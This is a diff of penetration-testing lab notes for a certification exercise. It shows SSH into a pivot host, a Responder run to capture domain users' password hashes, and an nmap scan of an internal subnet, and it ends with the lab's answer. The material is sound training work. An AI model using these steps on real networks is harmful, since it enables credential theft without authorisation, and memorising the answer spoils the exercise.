amandaguglieri/hackinglife/docs/cpts-labs.md

 **Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain.**

 ```
-# Access the pivot machine in two terminals
+# Access the pivot machine using two separate terminals:
 ssh $user@$ip

-# From one terminal set a responder server
+# In one terminal, set up a Responder server:
 ip a
 responder -I ens224

-# from the other terminal run a recon nmap command
+# In the other terminal, perform a reconnaissance scan using Nmap:
-nmap nmap -T4 -A 172.16.7.0/23 -oN scan.txt
+nmap -T4 -A 172.16.7.0/23 -oN scan.txt

-# In the responder we will see several users
+# The Responder server will capture several user credentials during the scan.
 ```

 Results: AB920